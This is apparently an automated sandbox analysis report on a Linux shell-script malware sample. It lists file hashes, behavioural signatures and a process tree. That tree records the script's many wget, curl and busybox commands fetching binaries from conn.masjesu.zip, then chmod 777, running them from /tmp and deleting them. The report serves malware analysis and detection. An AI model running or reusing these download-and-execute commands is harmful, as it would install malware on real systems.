Analysis
- max time kernel: 85s
- max time network: 88s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240729-en
- resource tags: arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 15/10/2024, 01:48
Static task: static1
Behavioral tasks (all run on sample 86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh):
- behavioral1: resource ubuntu1804-amd64-20240611-en
- behavioral2: resource debian9-armhf-20240418-en
- behavioral3: resource debian9-mipsbe-20240729-en
- behavioral4: resource debian9-mipsel-20240611-en
General
- Target: 86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
- Size: 10KB
- MD5: 5b7965317583f6ec3ecb200b64ab84dc
- SHA1: 242199969bb87b8f91c50399dbc9a2fcfa918cb9
- SHA256: 86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0
- SHA512: 53de4e8bcba6392755c42f5be1d230e71dbcd45fae9f4be439577b82097ac9039117b0ffed7bfe710b8e3bf6546d6c771c9b799d5b0c902e961fd5b43daf05b7
- SSDEEP: 96:YV1hXrraLcgAGdJdVPd2ZdTUcg69wLwsxLxpMLK9XKlK9l90+YWGuaYaUaG1l/VR:PAaSJSds6Pv8EdPvF8kKc
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 28 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE (28 IoCs)
Reads runtime system information
description: File opened for reading; ioc: /proc/sys/crypto/fips_enabled; Process: curl (the same entry is repeated for each curl process)
System Network Configuration Discovery (1 TTP, 64 IoCs)
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory (28 IoCs)
Malware often drops required files in the /tmp directory.
Processes
Each entry gives the image path, PID, command line and, in brackets, the signatures it triggered; the script's child processes are indented beneath it.
- /tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh (PID 711): /tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
  - /bin/rm (PID 714): /bin/rm bins.sh
  - /usr/bin/wget (PID 717): wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [System Network Configuration Discovery]
  - /usr/bin/curl (PID 731): curl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 743): /bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [System Network Configuration Discovery]
  - /bin/chmod (PID 744): chmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [File and Directory Permissions Modification]
  - /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H (PID 745): ./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [Executes dropped EXE]
  - /bin/rm (PID 746): rm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  - /usr/bin/wget (PID 747): wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  - /usr/bin/curl (PID 748): curl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 750): /bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [System Network Configuration Discovery]
  - /bin/chmod (PID 751): chmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [File and Directory Permissions Modification]
  - /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM (PID 752): ./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [Executes dropped EXE]
  - /bin/rm (PID 753): rm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  - /usr/bin/wget (PID 754): wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  - /usr/bin/curl (PID 755): curl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 765): /bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [System Network Configuration Discovery]
  - /bin/chmod (PID 768): chmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [File and Directory Permissions Modification]
  - /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag (PID 769): ./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [Executes dropped EXE]
  - /bin/rm (PID 773): rm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  - /usr/bin/wget (PID 775): wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [System Network Configuration Discovery]
  - /usr/bin/curl (PID 782): curl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 792): /bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [System Network Configuration Discovery]
  - /bin/chmod (PID 797): chmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [File and Directory Permissions Modification]
  - /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE (PID 798): ./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [Executes dropped EXE]
  - /bin/rm (PID 801): rm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  - /usr/bin/wget (PID 803): wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [System Network Configuration Discovery]
  - /usr/bin/curl (PID 814): curl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 816): /bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [System Network Configuration Discovery]
  - /bin/chmod (PID 817): chmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [File and Directory Permissions Modification]
  - /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x (PID 818): ./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [Executes dropped EXE]
  - /bin/rm (PID 819): rm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  - /usr/bin/wget (PID 820): wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [System Network Configuration Discovery]
  - /usr/bin/curl (PID 821): curl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 830): /bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  - /bin/chmod (PID 834): chmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [File and Directory Permissions Modification]
  - /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw (PID 835): ./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [Executes dropped EXE]
  - /bin/rm (PID 839): rm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  - /usr/bin/wget (PID 840): wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [System Network Configuration Discovery]
  - /usr/bin/curl (PID 847): curl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 856): /bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  - /bin/chmod (PID 861): chmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [File and Directory Permissions Modification]
  - /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC (PID 862): ./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [Executes dropped EXE]
  - /bin/rm (PID 864): rm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  - /usr/bin/wget (PID 865): wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [System Network Configuration Discovery]
  - /usr/bin/curl (PID 866): curl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 868): /bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  - /bin/chmod (PID 869): chmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [File and Directory Permissions Modification]
  - /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn (PID 870): ./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [Executes dropped EXE]
  - /bin/rm (PID 872): rm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  - /usr/bin/wget (PID 873): wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [System Network Configuration Discovery]
  - /usr/bin/curl (PID 874): curl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 876): /bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [System Network Configuration Discovery]
  - /bin/chmod (PID 880): chmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [File and Directory Permissions Modification]
  - /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD (PID 881): ./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [Executes dropped EXE]
  - /bin/rm (PID 883): rm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  - /usr/bin/wget (PID 884): wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [System Network Configuration Discovery]
  - /usr/bin/curl (PID 885): curl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 887): /bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  - /bin/chmod (PID 888): chmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [File and Directory Permissions Modification]
  - /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj (PID 889): ./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [Executes dropped EXE]
  - /bin/rm (PID 891): rm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  - /usr/bin/wget (PID 892): wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [System Network Configuration Discovery]
  - /usr/bin/curl (PID 893): curl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 895): /bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [System Network Configuration Discovery]
  - /bin/chmod (PID 896): chmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [File and Directory Permissions Modification]
  - /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA (PID 897): ./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [Executes dropped EXE]
  - /bin/rm (PID 899): rm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  - /usr/bin/wget (PID 900): wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [System Network Configuration Discovery]
  - /usr/bin/curl (PID 901): curl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 903): /bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [System Network Configuration Discovery]
  - /bin/chmod (PID 904): chmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [File and Directory Permissions Modification]
  - /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz (PID 905): ./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [Executes dropped EXE]
  - /bin/rm (PID 907): rm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  - /usr/bin/wget (PID 908): wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [System Network Configuration Discovery]
  - /usr/bin/curl (PID 909): curl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 911): /bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [System Network Configuration Discovery]
  - /bin/chmod (PID 912): chmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [File and Directory Permissions Modification]
  - /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H (PID 913): ./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [Executes dropped EXE]
  - /bin/rm (PID 915): rm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  - /usr/bin/wget (PID 916): wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [System Network Configuration Discovery]
  - /usr/bin/curl (PID 917): curl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 919): /bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [System Network Configuration Discovery]
  - /bin/chmod (PID 920): chmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [File and Directory Permissions Modification]
  - /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak (PID 921): ./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [Executes dropped EXE]
  - /bin/rm (PID 923): rm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  - /usr/bin/wget (PID 924): wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [System Network Configuration Discovery]
  - /usr/bin/curl (PID 925): curl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 927): /bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  - /bin/chmod (PID 928): chmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [File and Directory Permissions Modification]
  - /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn (PID 929): ./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn [Executes dropped EXE]
  - /bin/rm (PID 931): rm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
  - /usr/bin/wget (PID 932): wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [System Network Configuration Discovery]
  - /usr/bin/curl (PID 933): curl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 935): /bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [System Network Configuration Discovery]
  - /bin/chmod (PID 936): chmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [File and Directory Permissions Modification]
  - /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD (PID 937): ./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD [Executes dropped EXE]
  - /bin/rm (PID 939): rm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
  - /usr/bin/wget (PID 940): wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  - /usr/bin/curl (PID 941): curl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 943): /bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  - /bin/chmod (PID 944): chmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [File and Directory Permissions Modification]
  - /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj (PID 945): ./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj [Executes dropped EXE]
  - /bin/rm (PID 947): rm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
  - /usr/bin/wget (PID 948): wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [System Network Configuration Discovery]
  - /usr/bin/curl (PID 949): curl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 951): /bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [System Network Configuration Discovery]
  - /bin/chmod (PID 952): chmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [File and Directory Permissions Modification]
  - /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA (PID 953): ./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA [Executes dropped EXE]
  - /bin/rm (PID 955): rm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
  - /usr/bin/wget (PID 956): wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [System Network Configuration Discovery]
  - /usr/bin/curl (PID 957): curl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 959): /bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [System Network Configuration Discovery]
  - /bin/chmod (PID 960): chmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [File and Directory Permissions Modification]
  - /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz (PID 961): ./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz [Executes dropped EXE]
  - /bin/rm (PID 963): rm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
  - /usr/bin/wget (PID 964): wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [System Network Configuration Discovery]
  - /usr/bin/curl (PID 965): curl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 967): /bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [System Network Configuration Discovery]
  - /bin/chmod (PID 968): chmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [File and Directory Permissions Modification]
  - /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H (PID 969): ./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H [Executes dropped EXE]
  - /bin/rm (PID 971): rm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
  - /usr/bin/wget (PID 972): wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [System Network Configuration Discovery]
  - /usr/bin/curl (PID 973): curl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 975): /bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [System Network Configuration Discovery]
  - /bin/chmod (PID 976): chmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [File and Directory Permissions Modification]
  - /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak (PID 977): ./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak [Executes dropped EXE]
  - /bin/rm (PID 979): rm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
  - /usr/bin/wget (PID 980): wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [System Network Configuration Discovery]
  - /usr/bin/curl (PID 981): curl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 983): /bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  - /bin/chmod (PID 984): chmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [File and Directory Permissions Modification]
  - /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H (PID 985): ./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H [Executes dropped EXE]
  - /bin/rm (PID 986): rm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  - /usr/bin/wget (PID 987): wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [System Network Configuration Discovery]
  - /usr/bin/curl (PID 988): curl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 990): /bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  - /bin/chmod (PID 991): chmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [File and Directory Permissions Modification]
  - /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM (PID 992): ./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM [Executes dropped EXE]
  - /bin/rm (PID 993): rm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  - /usr/bin/wget (PID 994): wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [System Network Configuration Discovery]
  - /usr/bin/curl (PID 995): curl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 997): /bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [System Network Configuration Discovery]
  - /bin/chmod (PID 998): chmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [File and Directory Permissions Modification]
  - /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag (PID 999): ./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag [Executes dropped EXE]
  - /bin/rm (PID 1000): rm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  - /usr/bin/wget (PID 1001): wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [System Network Configuration Discovery]
  - /usr/bin/curl (PID 1002): curl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 1004): /bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [System Network Configuration Discovery]
  - /bin/chmod (PID 1005): chmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [File and Directory Permissions Modification]
  - /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE (PID 1006): ./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE [Executes dropped EXE]
  - /bin/rm (PID 1007): rm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  - /usr/bin/wget (PID 1008): wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [System Network Configuration Discovery]
  - /usr/bin/curl (PID 1009): curl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 1011): /bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  - /bin/chmod (PID 1012): chmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [File and Directory Permissions Modification]
  - /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x (PID 1013): ./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x [Executes dropped EXE]
  - /bin/rm (PID 1014): rm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  - /usr/bin/wget (PID 1015): wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [System Network Configuration Discovery]
  - /usr/bin/curl (PID 1016): curl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 1018): /bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  - /bin/chmod (PID 1019): chmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [File and Directory Permissions Modification]
  - /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw (PID 1020): ./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw [Executes dropped EXE]
  - /bin/rm (PID 1021): rm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  - /usr/bin/wget (PID 1022): wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [System Network Configuration Discovery]
  - /usr/bin/curl (PID 1023): curl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 1025): /bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [System Network Configuration Discovery]
  - /bin/chmod (PID 1026): chmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [File and Directory Permissions Modification]
  - /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC (PID 1027): ./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC [Executes dropped EXE]
  - /bin/rm (PID 1029): rm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
Network
MITRE ATT&CK Enterprise v15
Downloads
- Downloaded file 1
  Filesize: 176B
  MD5: e1732e70f015e99d14dff1eeeaec9966
  SHA1: c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
  SHA256: 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
  SHA512: 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7
- Downloaded file 2
  Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97